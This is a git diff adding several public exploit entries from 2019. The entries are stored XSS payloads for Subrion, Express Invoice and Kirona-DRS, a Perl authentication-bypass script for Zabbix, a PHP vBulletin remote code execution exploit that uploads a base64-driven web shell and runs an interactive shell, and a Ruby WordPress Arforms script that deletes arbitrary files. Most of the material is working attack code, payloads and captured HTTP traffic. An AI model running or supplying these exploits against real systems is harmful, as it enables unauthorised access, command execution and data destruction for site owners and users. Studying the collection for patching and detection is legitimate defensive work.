@@ -0,0 +1,17 @@
+# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting
+# Date: 2019-10-07
+# Author: Min Ko Ko (Creatigon)
+# Vendor Homepage: https://subrion.org/
+# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225
+# Website : https://l33thacker.com
+# Description :  Allows XSS via the panel/members/ Username, Full Name, or
+# Email field, aka an "Admin Member JSON Update" issue.
+
+First login the panel with user credential, Go to member tag from left menu.
+
+http://localhost/panel/members/
+
+Username, Full Name, Email are editable with double click on it. Insert the
+following payload
+
+<img src=x onerror=alert(document.cookie)>
\ No newline at end of file
diff --git a/exploits/php/webapps/47474.pl b/exploits/php/webapps/47474.pl
new file mode 100755
index 000000000..6ab6c3bdb
--- /dev/null
+++ b/exploits/php/webapps/47474.pl
@@ -0,0 +1,123 @@
+# Exploit Title: Zabbix 4.4 - Authentication Bypass
+# Date: 2019-10-06
+# Exploit Author: Todor Donev
+# Software Link: https://www.zabbix.com/download
+# Version: Zabbix 4.4
+# Tested on: Linux Apache/2 PHP/7.2
+
+#
+#  Zabbix <= 4.4  Authentication Bypass Demo PoC Exploit
+#
+#  Copyright 2019 (c) Todor Donev 
+#
+#  Disclaimer:
+#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
+#  caused by direct or indirect use of the  information or functionality provided by these programs. 
+#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
+#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
+#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!  
+#  
+#  (Dont do anything without permissions)
+#
+#	#  [ Zabbix <= 4.4  Authentication Bypass Demo PoC Exploit
+#	#  [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
+#	#  [ Initializing the browser
+#	#  [ >>> Referer => 
+#	#  [ >>> User-Agent => Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1
+#	#  [ >>> Content-Type => application/x-www-form-urlencoded
+#	#  [ <<< Cache-Control => no-store, no-cache, must-revalidate
+#	#  [ <<< Connection => close
+#	#  [ <<< Date => Mon, 07 Oct 2019 12:29:54 GMT
+#	#  [ <<< Pragma => no-cache
+#	#  [ <<< Server => nginx
+#	#  [ <<< Vary => Accept-Encoding
+#	#  [ <<< Content-Type => text/html; charset=UTF-8
+#	#  [ <<< Expires => Thu, 19 Nov 1981 08:52:00 GMT
+#	#  [ <<< Client-Date => Mon, 07 Oct 2019 12:29:54 GMT
+#	#  [ <<< Client-Peer => 
+#	#  [ <<< Client-Response-Num => 1
+#	#  [ <<< Client-SSL-Cert-Issuer => 
+#	#  [ <<< Client-SSL-Cert-Subject => 
+#	#  [ <<< Client-SSL-Cipher => ECDHE-RSA-AES128-GCM-SHA256
+#	#  [ <<< Client-SSL-Socket-Class => IO::Socket::SSL
+#	#  [ <<< Client-SSL-Warning => Peer certificate not verified
+#	#  [ <<< Client-Transfer-Encoding => chunked
+#	#  [ <<< Link => <favicon.ico>; rel="icon"<assets/img/apple-touch-icon-76x76-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="76x76"<assets/img/apple-touch-icon-120x120-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="120x120"<assets/img/apple-touch-icon-152x152-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="152x152"<assets/img/apple-touch-icon-180x180-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="180x180"<assets/img/touch-icon-192x192.png>; rel="icon"; sizes="192x192"<assets/styles/dark-theme.css>; rel="stylesheet"; type="text/css"
+#	#  [ <<< Set-Cookie => zbx_sessionid=e125efe43b1f67b0fdbfb4db2fa1ce0d; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnly
+#	#  [ <<< Strict-Transport-Security => max-age=63072000; includeSubdomains; preload
+#	#  [ <<< Title => TARGET: Dashboard
+#	#  [ <<< X-Content-Type-Options => nosniff
+#	#  [ <<< X-Frame-Options => SAMEORIGIN
+#	#  [ <<< X-Meta-Author => Zabbix SIA
+#	#  [ <<< X-Meta-Charset => utf-8
+#	#  [ <<< X-Meta-Csrf-Token => fdbfb4db2fa1ce0d
+#	#  [ <<< X-Meta-Msapplication-Config => none
+#	#  [ <<< X-Meta-Msapplication-TileColor => #d40000
+#	#  [ <<< X-Meta-Msapplication-TileImage => assets/img/ms-tile-144x144.png
+#	#  [ <<< X-Meta-Viewport => width=device-width, initial-scale=1
+#	#  [ <<< X-UA-Compatible => IE=Edge
+#	#  [ <<< X-XSS-Protection => 1; mode=block
+#	#  [
+#	#  [ The target is vulnerable. Try to open these links:
+#	#  [ https://TARGET/zabbix/zabbix.php?action=dashboard.view
+#	#  [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1
+#	#  [ https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1
+#	#  [ https://TARGET/zabbix/overview.php?ddreset=1
+#	#  [ https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1
+#	#  [ https://TARGET/zabbix/latest.php?ddreset=1
+#	#  [ https://TARGET/zabbix/charts.php?ddreset=1
+#	#  [ https://TARGET/zabbix/screens.php?ddreset=1
+#	#  [ https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1
+#	#  [ https://TARGET/zabbix/srv_status.php?ddreset=1
+#	#  [ https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1
+#	#  [ https://TARGET/zabbix/hostinventories.php?ddreset=1
+#	#  [ https://TARGET/zabbix/report2.php?ddreset=1
+#	#  [ https://TARGET/zabbix/toptriggers.php?ddreset=1
+#	#  [ https://TARGET/zabbix/zabbix.php?action=dashboard.list
+#	#  [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1
+# 
+
+#!/usr/bin/perl -w
+
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use HTML::TreeBuilder;
+my $host = shift || ''; # Full path url to the store
+$host =~ s|/$||;
+print "\033[2J";    #clear the screen
+print "\033[0;0H"; #jump to 0,0
+print "[ Zabbix <= 4.4  Authentication Bypass Demo PoC Exploit\n";
+print "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
+print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+   $browser->timeout(30);
+   $browser->agent($user_agent);
+my $target = $host."\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);                      
+my $response = $browser->request($request);
+print "[ >>> $_ => ", $request->header($_), "\n" for  $request->header_field_names;
+print "[ <<< $_ => ", $response->header($_), "\n" for  $response->header_field_names;
+print "[ Exploit failed! 401 Unauthorized!\n" and exit if ($response->code eq '401');
+print "[ Exploit failed! 403 Forbidden!\n" and exit if ($response->code eq '403');
+if (defined ($response->as_string()) && ($response->as_string() =~ m/Dashboard/)){
+    print "[\n[ The target is vulnerable. Try to open these links:\n";
+    my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
+    my @files = $tree->look_down(_tag => 'a');
+    for my $line (@files){
+        next if ($line->attr('href') =~ m/javascript/);
+        next if ($line->attr('href') =~ m/\#/);
+        next if ($line->attr('href') =~ m/http/);
+        print "[ ", $host."/zabbix/".$line->attr('href'), "\n";
+    }
+} else { 
+        print "[ Exploit failed! The target isn't vulnerable\n";
+        exit;
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/47475.php b/exploits/php/webapps/47475.php
new file mode 100644
index 000000000..08247ebb2
--- /dev/null
+++ b/exploits/php/webapps/47475.php
@@ -0,0 +1,121 @@
+<?php
+
+/*
+    ---------------------------------------------------------------------
+    vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Vulnerability
+    ---------------------------------------------------------------------
+    
+    author..............: Egidio Romano aka EgiX
+    mail................: n0b0d13s[at]gmail[dot]com
+    software link.......: https://www.vbulletin.com/
+    
+    +-------------------------------------------------------------------------+
+    | This proof of concept code was written for educational purpose only.    |
+    | Use it at your own risk. Author will be not responsible for any damage. |
+    +-------------------------------------------------------------------------+
+    
+    [-] Vulnerability Description:
+      
+    User input passed through the "data[extension]" and "data[filedata]" parameters to
+    the "ajax/api/user/updateAvatar" endpoint is not properly validated before being used
+    to update users' avatars. This can be exploited to inject and execute arbitrary PHP code.
+    Successful exploitation of this vulnerability requires the "Save Avatars as Files" option
+    to be enabled (disabled by default).
+
+    [-] Disclosure timeline:
+    
+    [30/09/2019] - Vendor notified
+    [03/10/2019] - Patch released: https://bit.ly/2OptAzI
+    [04/10/2019] - CVE number assigned (CVE-2019-17132)
+    [07/10/2019] - Public disclosure
+
+*/
+
+set_time_limit(0);
+error_reporting(E_ERROR);
+
+if (!extension_loaded("curl")) die("[-] cURL extension required!\n");
+
+print "+-------------------------------------------------------------------------+";
+print "\n| vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Exploit by EgiX |";
+print "\n+-------------------------------------------------------------------------+\n";
+
+if ($argc != 4)
+{
+	print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n";
+	print "\nExample....: php $argv[0] http://localhost/vb/ user passwd";
+	print "\nExample....: php $argv[0] https://vbulletin.com/ evil hacker\n\n";
+	die();
+}
+
+list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];
+
+$ch = curl_init();
+
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+curl_setopt($ch, CURLOPT_HEADER, true);
+
+print "\n[-] Logging in with username '{$user}' and password '{$pass}'\n";
+
+curl_setopt($ch, CURLOPT_URL, $url);
+
+if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Session ID not found!\n");
+
+curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login");
+curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
+curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}");
+
+if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Login failed!\n");
+
+print "[-] Logged-in! Retrieving security token...\n";
+
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch, CURLOPT_POST, false);
+curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
+
+if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[-] Security token not found!\n");
+
+print "[-] Uploading new avatar...\n";
+
+$params = ["profilePhotoFile" => new CURLFile("avatar.jpeg"), "securitytoken" => $token[1]];
+
+curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=profile/upload-profilepicture");
+curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
+curl_setopt($ch, CURLOPT_HEADER, false);
+
+if (($path = (json_decode(curl_exec($ch)))->avatarpath) == null) die("[-] Upload failed!\n");
+
+if (preg_match('/image\.php\?/', $path)) die("[-] Sorry, the 'Save Avatars as Files' option is disabled!\n");
+
+print "[-] Updating avatar with PHP shell...\n";
+
+$php_code = '<?php print("____"); passthru(base64_decode($_SERVER["HTTP_CMD"])); ?>';
+
+$params = ["routestring" => "ajax/api/user/updateAvatar",
+           "userid" => 0,
+           "avatarid" => 0,
+           "data[extension]" => "php",
+           "data[filedata]" => $php_code,
+           "securitytoken" => $token[1]];
+
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
+
+if (curl_exec($ch) !== "true") die("[-] Update failed!\n");
+
+print "[-] Launching shell...\n";
+
+preg_match('/(\d+)\.jpeg/', $path, $m);
+$path = preg_replace('/(\d+)\.jpeg/', ($m[1]+1).".php", $path);
+
+curl_setopt($ch, CURLOPT_URL, "{$url}core/{$path}");
+curl_setopt($ch, CURLOPT_POST, false);
+
+while(1)
+{
+    print "\nvb-shell# ";
+    if (($cmd = trim(fgets(STDIN))) == "exit") break;
+    curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
+    preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/47492.rb b/exploits/php/webapps/47492.rb
new file mode 100755
index 000000000..7d08c7618
--- /dev/null
+++ b/exploits/php/webapps/47492.rb
@@ -0,0 +1,236 @@
+# Exploit Title: WordPress Arforms 3.7.1 - Directory Traversal 
+# Date: 2019-09-27
+# Exploit Author: Ahmad Almorabea
+# Updated version of the exploit can be found always at : http://almorabea.net/cve-2019-16902.txt 
+# Software Link: https://www.arformsplugin.com/documentation/changelog/
+# Version: 3.7.1
+# CVE ID: CVE-2019-16902
+
+#**************Start Notes**************
+# You can run the script by putting the script name and then the URL and the URL should have directory the Wordpress folders.
+# Example : exploit.rb www.test.com, and the site should have the Wordpress folders in it such www.test.com/wp-contnet.
+# Pay attention to the 3 numbers at the beginning maybe you need to change it in other types like in this script is 143.
+# But maybe in other forms maybe it's different so you have to change it accordingly.
+# This version of the software is applicable to path traversal attack so you can delete files if you knew the path such ../../ and so on 
+# There is a request file with this Script make sure to put it in the same folder.
+#**************End Notes****************
+
+#!/usr/bin/env ruby
+
+require "net/http"
+require 'colorize'
+
+$host       = ARGV[0] || ""
+$session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad"
+
+
+def start_function ()
+
+  puts "It's a weird question to ask but let's start friendly I'm Arforms exploit, what's your name?".yellow
+  name = STDIN.gets
+
+  if $host == ""
+      puts "What are you doing #{name} where is the URL so we can launch the attack, please pay more attention buddy".red
+      exit
+  end
+
+
+  check_existence_arform_folder
+  execute_deletion_attack
+ 
+  puts "Done ... see ya  " + name 
+
+end
+
+
+def send_checks(files_names)
+
+
+ 
+ 
+  j = 1
+  while j <= files_names.length-1
+  
+      uri = URI.parse("http://#{$host}/wp-content/uploads/arforms/userfiles/"+files_names[j])
+      http = Net::HTTP.new(uri.host, uri.port)
+      http.use_ssl = true if uri.scheme == 'https'    # Enable HTTPS support if it's HTTPS
+
+      request = Net::HTTP::Get.new(uri.request_uri)
+      request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
+      request["Connection"] = "keep-alive"
+      request["Accept-Language"] = "en-US,en;q=0.5"
+      request["Accept-Encoding"] = "gzip, deflate"
+      request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
+      
+
+      begin
+        
+        response = http.request(request).code
+        puts "The File " + files_names[j] + " has the response code of " + response
+      rescue Exception => e
+        puts "[!] Failed!"
+        puts e
+      end
+      j = j+1 
+  end
+end
+
+
+def check_existence_arform_folder ()
+
+ 
+
+  path_array = ["/wp-plugins/arforms","/wp-content/uploads/arforms/userfiles"]
+  $i = 0 
+  results = []
+
+  while $i <= path_array.length-1  
+    
+    uri = URI.parse("http://#{$host}/#{path_array[$i]}")
+    #puts uri
+    http = Net::HTTP.new(uri.host, uri.port)
+    http.use_ssl = true if uri.scheme == 'https'    # Enable HTTPS support if it's HTTPS
+    request = Net::HTTP::Get.new(uri.request_uri)
+    response = http.request(request)
+    results[$i] = response.code
+    #puts"response code is : " + response.code
+    
+    $i +=1
+
+  end
+
+  puts "****************************************************"
+  
+  if results[0] == "200" || results[0] =="301"
+
+    puts "The Plugin is Available on the following path : ".green + $host + path_array[0]
+  else
+    puts "We couldn't locate the Plugin in this path, you either change the path or we can't perform the attack, Simple Huh?".red
+    exit
+  end
+  
+  if (results[1] == "200" || results[1] == "301")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     
+
+      puts "The User Files  folder is  Available on the following path : ".green + $host + path_array[1]
+  else
+
+     puts "We couldn't find the User Files folder, on the following path ".red +  $host + path_array[1]
+    
+  end
+  puts "****************************************************"
+
+  
+
+end
+
+
+def execute_deletion_attack ()
+
+    
+
+    puts "How many file you want to delete my man"
+    amount = STDIN.gets.chomp.to_i
+
+    if(amount == 0)
+      puts "You can't use 0 or  other strings this input for the amount of file you want to delete so it's an Integer".blue
+      exit
+    end
+
+    file_names = []
+    file_names[0] = "143_772_1569713145702_temp3.txt"
+    j = 1
+   while j <= amount.to_i
+      puts "Name of the file number " + j.to_s 
+      file_names[j] = STDIN.gets
+      file_names[j].strip!
+      j = j+1
+    end
+
+
+    uri = URI.parse("http://#{$host}")
+    #puts uri
+    http = Net::HTTP.new(uri.host, uri.port)
+    http.use_ssl = true if uri.scheme == 'https'   
+    request = Net::HTTP::Get.new(uri.request_uri)
+    response = http.request(request)
+    global_cookie = response.response['set-cookie'] + "; PHPSESSID="+$session_id #Assign the session cookie
+  
+
+
+
+    $i = 0
+    while $i <= file_names.length-1 
+
+    puts "Starting the Attack Journey .. ".green 
+
+      uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
+      headers =
+      {
+         'Referer'         => 'From The Sky',
+         'User-Agent'      => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
+         'Content-Type'    => 'multipart/form-data; boundary=---------------------------14195989911851978808724573615',
+         'Accept-Encoding' => 'gzip, deflate',
+         'Cookie'          => global_cookie,
+         'X_FILENAME'      => file_names[$i],
+         'X-FILENAME'      => file_names[$i],
+         'Connection'      => 'close'
+
+       }
+
+      http    = Net::HTTP.new(uri.host, uri.port)
+      http.use_ssl = true if uri.scheme == 'https'    
+      request = Net::HTTP::Post.new(uri.path, headers)
+      request.body = File.read("post_file")
+      response = http.request request
+     
+      $i = $i +1     
+  end
+    
+    execute_delete_request file_names,global_cookie,amount.to_i
+    
+    puts "Finished.........."
+
+end
+
+def execute_delete_request (file_names,cookies,rounds )
+
+  
+    $i = 0
+    
+    while $i <= file_names.length-1   
+
+    puts "Starting the Attack on file No #{$i.to_s} ".green  
+  
+        uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
+        headers =
+        {
+           'Referer'         => 'From The Sky',
+           'User-Agent'      => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
+           'Accept'          => '*/*',
+           'Accept-Language' => 'en-US,en;q=0.5',
+           'X-Requested-With'=> 'XMLHttpRequest',
+           'Cookie'          =>  cookies,
+           'Content-Type'    => 'application/x-www-form-urlencoded; charset=UTF-8',
+           'Accept-Encoding' => 'gzip, deflate',
+           'Connection'      => 'close'
+        }
+
+        http    = Net::HTTP.new(uri.host, uri.port)
+        http.use_ssl = true if uri.scheme == 'https'   
+        request = Net::HTTP::Post.new(uri.path,headers)
+        request.body = "action=arf_delete_file&file_name="+file_names[$i]+"&form_id=143"
+        response = http.request(request)
+        
+        if $i != 0
+          puts "File Name requested to delete is : " + file_names[$i] + " has the Response Code of " + response.code
+        end
+         $i = $i +1 
+     
+    end
+
+    send_checks file_names
+     
+end
+
+
+start_function()
\ No newline at end of file
diff --git a/exploits/php/webapps/47496.txt b/exploits/php/webapps/47496.txt
new file mode 100644
index 000000000..ea140408b
--- /dev/null
+++ b/exploits/php/webapps/47496.txt
@@ -0,0 +1,62 @@
+# Exploit Title: Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting
+# Exploit Author: Debashis Pal
+# Date: 2019-10-13
+# Vendor Homepage: https://www.nchsoftware.com/
+# Source: https://www.nchsoftware.com/invoice/index.html
+# Version: Express Invoice v7.12
+# CVE : N/A
+# Tested on: Windows 7 SP1(32bit)
+
+# About Express Invoice v7.12
+==============================
+Express Invoice lets you create invoices you can print, email or fax directly to clients for faster payment. 
+
+# Vulnerability 
+================
+Persistent Cross site scripting (XSS).
+
+# PoC 
+======
+
+1. Login as authenticated unprivileged user to Express Invoice version 7.12 web enable service i.e  http://A.B.C.D:96 [Default installation]. 
+
+2. Under "Invoices" Invoices List -> View Invoices -> Add New Invoice -> Customer: Field put </script><script>alert('XSS');</script>
+
+Save the change. 
+
+or 
+
+Under "Items" 
+Items -> Add new item-> Item field: put  </script><script>alert('XSS');</script>
+
+Save the change. 
+
+or 
+
+Under "Customers" 
+Customers -> Add New Customer -> Customer Name:  put  </script><script>alert('XSS');</script>
+
+Save the change. 
+
+or 
+
+Under "Quotes"
+Quotes -> View Quotes -> Add New Quote -> Customer: put  </script><script>alert('XSS');</script>
+
+Save the change. 
+
+3. Login in authenticated privileged or unprivileged  user to Express Invoice v7.12 web enable service and visit any of Invoices/Items/Customers/Quotes section, Persistent XSS payload will execute.
+
+
+# Disclosure Timeline
+======================
+Vulnerability Discover Date: 12-Sep-2019.
+Vulnerability notification to vendor via vendor provided web form: 12-Sep-2019 ,13-Sep-2019, 19-Sep-2019, 26-Sep-2019, no responds. 
+Submit exploit-db : 14-Oct-2019.
+
+
+# Disclaimer
+=============
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
+The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
\ No newline at end of file
diff --git a/exploits/php/webapps/47498.txt b/exploits/php/webapps/47498.txt
new file mode 100644
index 000000000..0110ed369
--- /dev/null
+++ b/exploits/php/webapps/47498.txt
@@ -0,0 +1,329 @@
+# Exploit Title: Kirona-DRS 5.5.3.5 - Information Disclosure
+# Discovered Date: 2019-10-03
+# Shodan Search: /opt-portal/pages/login.xhtml
+# Exploit Author: Ramikan
+# Vendor Homepage: https://www.kirona.com/products/dynamic-resource-scheduler/
+# Affected Version: DRS 5.5.3.5 may be other versions.
+# Tested On Version: DRS 5.5.3.5 on PHP/5.6.14
+# Vendor Fix: Unknown
+# CVE: CVE-2019-17503,CVE-2019-17504
+# Category: Web Apps
+# Reference : https://github.com/Ramikan/Vulnerabilities/blob/master/Kirona-DRS 5.5.3.5 Multiple Vulnerabilities
+
+# Description:
+# The application is vulnerable to the HTML injection, reflected cross site scripting and sensitive data disclosure.
+
+# Vulnerabiity 1:HTML injection and  (CVE-2019-17504)
+# An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. A reflected Cross-site scripting (XSS) 
+# vulnerability allows remote attackers to inject arbitrary web script via the /osm/report/ 'password' parameter.
+
+Affected URL: /osm/report/ 
+
+Affected Parameter: password
+
+
+POST Request:
+
+POST /osm/report/ HTTP/1.1
+Host: 10.50.3.148
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 147
+Connection: close
+Referer: https://10.50.3.148/osm/report/
+Upgrade-Insecure-Requests: 1
+
+create=true&password=&login=admin&password='<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--
+
+
+Response:
+
+HTTP/1.1 200 OK
+Date: Thu, 03 Oct 2019 14:56:05 GMT
+Server: Apache
+X-Powered-By: PHP/5.6.14
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Headers: X-Requested-WithXDomainRequestAllowed: 1
+Expires: Mon, 26 Jul 1997 05:00:00 GMT
+Last-Modified: Thu, 03 Oct 2019 14:56:05 GMT
+Cache-Control: no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 728
+Connection: close
+Content-Type: text/html;charset=UTF-8
+
+          <html>
+          <head>  
+            <img src='logo.jpg'>      
+            <form method='POST'>
+              <input type='hidden' name='create' value='true'/>
+              <input type='hidden' name='password' value=''<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/>
+              <table>
+                  <tr><td>Login:</td><td><input type='login' name='login'/></td></tr>
+                  <tr><td>Password:</td><td><input type='password' name='password'/></td></tr>
+                  <tr><td colspan='2'><input type='submit' value='Login'/> </td></tr>
+              </table>
+            </form>
+          </head>
+          </html>
+
+
+GET Request:
+
+GET https://10.0.1.110/osm/report/?password=%27%3C%22%20%3E%3C%3Ch1%3EHTML%20Injection-heading%20tag%20used%3C/h1%3E%3Cscript%3Ealert(%22This%20is%20Cross%20Site%20Scripting%22)%3C/script%3E%3C!-- HTTP/1.1
+Host: vs-kdrs-l-01.selwoodhousing.local
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+Response:
+
+HTTP/1.1 200 OK
+Date: Thu, 03 Oct 2019 14:53:35 GMT
+Server: Apache
+X-Powered-By: PHP/5.6.14
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Headers: X-Requested-With
+XDomainRequestAllowed: 1
+Expires: Mon, 26 Jul 1997 05:00:00 GMT
+Last-Modified: Thu, 03 Oct 2019 14:53:35 GMT
+Cache-Control: no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 728
+Connection: close
+Content-Type: text/html;charset=UTF-8
+
+          <html>
+          <head>  
+            <img src='logo.jpg'>      
+            <form method='POST'>
+              <input type='hidden' name='create' value='true'/>
+              <input type='hidden' name='password' value=''<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/>
+              <table>
+                  <tr><td>Login:</td><td><input type='login' name='login'/></td></tr>
+                  <tr><td>Password:</td><td><input type='password' name='password'/></td></tr>
+                  <tr><td colspan='2'><input type='submit' value='Login'/> </td></tr>
+              </table>
+            </form>
+          </head>
+          </html> 
+        
+
+***************************************************************************************************************************
+Vulnerability 2: Source code and sensitive data disclosure. (CVE-2019-17503)
+***************************************************************************************************************************
+
+An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly: it contains sensitive information about the database through the SQL queries within this batch file. This file exposes SQL database information such as database version, table name, column name, etc.
+
+Affected URL: /osm/REGISTER.cmd or /osm_tiles/REGISTER.cmd
+
+# Request:
+
+GET /osm/REGISTER.cmd HTTP/1.1
+Host: 10.0.0.148
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+Response:
+
+HTTP/1.1 200 OK
+Date: Thu, 03 Oct 2019 09:23:54 GMT
+Server: Apache
+Last-Modified: Tue, 07 Nov 2017 09:27:52 GMT
+ETag: "1fc4-55d612f6cae13"
+Accept-Ranges: bytes
+Content-Length: 8132
+Connection: close
+
+@echo off
+
+set DEBUGMAPSCRIPT=TRUE
+
+rem
+rem Find root path and batch name
+rem root path is found relative to the current batch name
+rem 
+
+rem turn to short filename (remove white spaces)
+for %%i in (%0) do (
+  	set SHORT_MAPSCRIPTBATCH_FILE=%%~fsi
+    set MAPSCRIPTBATCH_FILE=%%~i
+    
+)
+for %%i in (%SHORT_MAPSCRIPTBATCH_FILE%) do (
+	set MAPSCRIPTROOTDIR=%%~di%%~pi..\..\..
+)
+
+if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTROOTDIR=%MAPSCRIPTROOTDIR%
+if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTBATCH_FILE=%MAPSCRIPTBATCH_FILE%
+
+rem
+rem find if we are in INTERRACTIVE mode or not and check the parameters
+rem 
+if "%1"=="" goto INTERACTIVE
+goto NONINTERRACTIVE
+
+
+:NONINTERRACTIVE
+rem non interractive call so catch the parameters from command line
+rem this is supposed to be called from the root DRS directory
+
+if "%2"=="" (
+  echo Invalid parameter 2
+  pause
+  goto :EOF
+)
+
+set ACCOUNT=%2
+set STATIC=NO
+if "%1"=="STATIC" set STATIC=YES
+
+if "%DEBUGMAPSCRIPT%"=="TRUE" echo Command line mode %STATIC% %ACCOUNT%
+
+if "%1"=="STATIC" goto GLOBAL
+if "%1"=="DYNAMIC" goto GLOBAL
+echo Invalid parameter 1
+pause
+goto :EOF
+
+:INTERACTIVE
+rem Interractive mode : ask for account and static mode
+if "%DEBUGMAPSCRIPT%"=="TRUE" echo Interractive mode
+echo Open Street Map setup for Xmbrace DRS
+set /P ACCOUNT=Account name:
+set /P STATIC=Limited map feature (YES/NO):
+
+
+rem back to the setup directory
+cd %MAPSCRIPTROOTDIR%
+
+rem # READ AND DEFINE SETTINGS
+for /F "tokens=1,* delims==" %%k in (conf\default.txt) do (
+  if not "%%k"=="#=" set %%k=%%l
+)
+if exist CUSTOM\CONF\custom.txt (
+  for /F "tokens=1,* delims==" %%k in (CUSTOM\CONF\custom.txt) do (
+    if not "%%k"=="#=" set %%k=%%l
+  )
+)
